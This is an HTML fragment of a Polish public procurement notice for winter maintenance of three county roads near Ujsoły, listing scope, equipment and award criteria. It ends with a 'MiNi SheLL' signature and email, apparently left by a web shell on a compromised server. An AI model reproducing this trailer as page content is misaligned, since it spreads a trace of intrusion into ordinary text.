id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Zimowe utrzymanie drogi powiatowej: S-1439 Kamesznica - Milówka - Rajcza - Ujsoły - gr. Państwa na odcinku od granicy z miejscowością Rajcza do granicy Państwa w m. Glinka</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Zakres zamówienia obejmuje zimoweutrzymanie drogi powiatowej S-1439 Kamesznica - Milówka - Rajcza - Ujsoły gr. państwa, naodcinku od granicy z miejscowością Rajcza do granicy Państwa w m. Glinka Km 0+000 do km10 + 901 w następujących standardach: 1) Odcinek I - długość 3 200 mb - od granicy z gminąRajcza do skrzyżowania drogi S-1439 z ul. Gminną, gmina Ujsoły, w standardzie III 2) OdcinekII - długość 7 701 mb - od do skrzyżowania drogi S-1439 z ul. Gminną, gmina Ujsoły, doprzejścia granicznego w Glince, w standardzie III Dodatkowo w ciągu tej drogi: 3) Pętlaautobusowa w Glince - powierzchnia ok. 550 m2 w standardzie III 4) Parking obok przejściagranicznego - powierzchnia ok. 474 m2 w standardzie III Droga utrzymana ,,na czarno".Wytyczne dotyczące standardu III stanowią załącznik nr 1 do Szczegółowej SpecyfikacjiTechnicznej - Standardy Odśnieżania Dróg Powiatowych. 2. Zamówienie obejmuje: -odśnieżanie drogi na całej szerokości, usuwanie śliskości zimowej drogi przez posypywaniemateriałami (piaskiem, kruszywo niesortowane o uziarnieniu do 4 mm, mieszanka). 3. Średniaprędkość poruszania się pługu i piaskarki - 25 km/godzinę. 4. Długość drogi i normatywny czasjednorazowego jej objazdu (tam i z powrotem) w średnich warunkach zimowych wynosi:Długość drogi w km (tam i z powrotem) Normatywny czas (w min.) jednorazowego objazdu21,802 + pętla autobusowa + parking obok przejścia granicznego 52 30 SUMA 82 Czasodśnieżania przystanku i placu ustalony został w oparciu o średni czas odśnieżania tych miejsc wlatach ubiegłych. Do realizacji przedmiotu umowy Wykonawca powinien zapewnić następującysprzęt: 1) samochód (ciągnik) z pługiem, 2) samochód (ciągnik) z rozrzutnikiem, ewentualniesamochód (ciągnik) z pługiem i rozrzutnikiem, 3) pług wirnikowy. DODATKOWEUSTALENIA 1. Zimowe utrzymanie musi być wykonywane zgodnie z wymogami SST dot.odśnieżania i zwalczania śliskości zimowej, które stanowią załączniki do niniejszej specyfikacji.2. Wykonawca zobowiązany jest do prowadzenia książki raportów dziennych, w którejkażdorazowy wpis musi być potwierdzony przez Koordynatora wyznaczonego przezZamawiającego. 3. Po sezonie zimowym tj. po zakończeniu świadczenia usług związanych zzimowym utrzymaniem dróg wykonawca jest zobowiązany do uprzątnięcia materiałów któresłużyły do posypywania dróg w terminie wskazanym przez zamawiającego. 4. Wykonawca wtrakcie przygotowywania oferty, powinien wziąć pod uwagę, iż na drogach powiatowych mogąwystąpić utrudnienia związane z wykonywaniem robót budowlanych. 5. Zamawiający dowykonania powyższego zamówienia nie wskazuje czynności w zakresie realizacji zamówienia, wstosunku do których wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawieumowy o pracę.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>90620000-9, 90630000-2<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-04-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Najniższa Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin zapłaty</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Zimowe utrzymanie drogi powiatowej: S- 1442 Ujsoły - Soblówka</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Zakreszamówienia obejmuje zimowe utrzymanie drogi powiatowej S-1442 Ujsoły - Soblówka, Gm.Ujsoły. km 0+000 do km 04 + 042 w standardzie III. Droga utrzymana ,,na czarno".Dodatkowo w ciągu tej drogi: 1) Parking przy kościele w Soblówce - powierzchnia 600 m2 wstandardzie I"" Wytyczne dotyczące standardu III stanowią załącznik nr 1 do SzczegółowejSpecyfikacji Technicznej - Standardy Odśnieżania Dróg Powiatowych. 2. Zamówienieobejmuje: - odśnieżanie drogi na całej szerokości, usuwanie śliskości zimowej drogi przezposypywanie materiałami (piaskiem, kruszywo niesortowane o uziarnieniu do 4 mm). 3. Średniaprędkość poruszania się pługu i piaskarki - 25 km/godzinę. 4. Długość drogi i normatywny czasjednorazowego jej objazdu (tam i z powrotem) w średnich warunkach zimowych wynosi:Długość drogi w km (tam i z powrotem) Normatywny czas (w min.) jednorazowego objazdu8,084 +Parking przy kościele w Soblówce 26 17 SUMA 43 Czas odśnieżania parkinguustalony został w oparciu o średni czas odśnieżania tego miejsca latach ubiegłych. Do realizacjiprzedmiotu umowy Wykonawca powinien zapewnić następujący sprzęt: 1) samochód (ciągnik) zpługiem, 2) samochód (ciągnik) z rozrzutnikiem, ewentualnie samochód (ciągnik) z pługiem irozrzutnikiem, 3) pług wirnikowy. DODATKOWE USTALENIA 1. Zimowe utrzymanie musibyć wykonywane zgodnie z wymogami SST dot. odśnieżania i zwalczania śliskości zimowej,które stanowią załączniki do niniejszej specyfikacji. 2. Wykonawca zobowiązany jest doprowadzenia książki raportów dziennych, w której każdorazowy wpis musi być potwierdzonyprzez Koordynatora wyznaczonego przez Zamawiającego. 3. Po sezonie zimowym tj. pozakończeniu świadczenia usług związanych z zimowym utrzymaniem dróg wykonawca jestzobowiązany do uprzątnięcia materiałów które służyły do posypywania dróg w terminiewskazanym przez zamawiającego. 4. Wykonawca w trakcie przygotowywania oferty, powinienwziąć pod uwagę, iż na drogach powiatowych mogą wystąpić utrudnienia związane zwykonywaniem robót budowlanych. 5. Zamawiający do wykonania powyższego zamówienia niewskazuje czynności w zakresie realizacji zamówienia, w stosunku do których wymagazatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>90620000-9, 90630000-2<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-04-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Najniższa Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin zapłaty</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Zimowe utrzymanie drogi powiatowej: S- 1441 Ujsoły - Złatna</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Zakres zamówieniaobejmuje zimowe utrzymanie drogi powiatowej S-1441 Ujsoły - Złatna, Gm. Ujsoły. Km0+000 do km 07 + 200 w standardzie III. Droga utrzymana ,,na czarno". Dodatkowo w ciągutej drogi: 1) Przystanek Kuflówka - powierzchnia 214 m2 w standardzie III 2) Plac Złatna Huta- powierzchnia 400 m2 w standardzie III Wytyczne dotyczące standardu III stanowią załączniknr 1 do Szczegółowej Specyfikacji Technicznej - Standardy Odśnieżania Dróg Powiatowych. 2.Zamówienie obejmuje: - odśnieżanie drogi na całej szerokości, usuwanie śliskości zimowej drogiprzez posypywanie materiałami (piaskiem, kruszywo niesortowane o uziarnieniu do 4 mm). 3.Średnia prędkość poruszania się pługu i piaskarki - 25 km/godzinę. 4. Długość drogi inormatywny czas jednorazowego jej objazdu (tam i z powrotem) w średnich warunkachzimowych wynosi: Długość drogi w km (tam i z powrotem) Normatywny czas (w min.)jednorazowego objazdu 14,400 + przystanek Kuflówka + plac Złatna Huta 34 26 SUMA 60Czas odśnieżania przystanku i placu ustalony został w oparciu o średni czas odśnieżania tychmiejsc w latach ubiegłych. Do realizacji przedmiotu umowy Wykonawca powinien zapewnićnastępujący sprzęt: 1) samochód (ciągnik) z pługiem, 2) samochód (ciągnik) z rozrzutnikiem,ewentualnie samochód (ciągnik) z pługiem i rozrzutnikiem, 3) pług wirnikowy. DODATKOWEUSTALENIA 1. Zimowe utrzymanie musi być wykonywane zgodnie z wymogami SST dot.odśnieżania i zwalczania śliskości zimowej, które stanowią załączniki do niniejszej specyfikacji.2. Wykonawca zobowiązany jest do prowadzenia książki raportów dziennych, w którejkażdorazowy wpis musi być potwierdzony przez Koordynatora wyznaczonego przezZamawiającego. 3. Po sezonie zimowym tj. po zakończeniu świadczenia usług związanych zzimowym utrzymaniem dróg wykonawca jest zobowiązany do uprzątnięcia materiałów któresłużyły do posypywania dróg w terminie wskazanym przez zamawiającego. 4. Wykonawca wtrakcie przygotowywania oferty, powinien wziąć pod uwagę, iż na drogach powiatowych mogąwystąpić utrudnienia związane z wykonywaniem robót budowlanych. 5. Zamawiający dowykonania powyższego zamówienia nie wskazuje czynności w zakresie realizacji zamówienia, wstosunku do których wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawieumowy o pracę.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>90620000-9, 90630000-2<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-04-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Najniższa Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin zapłaty</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com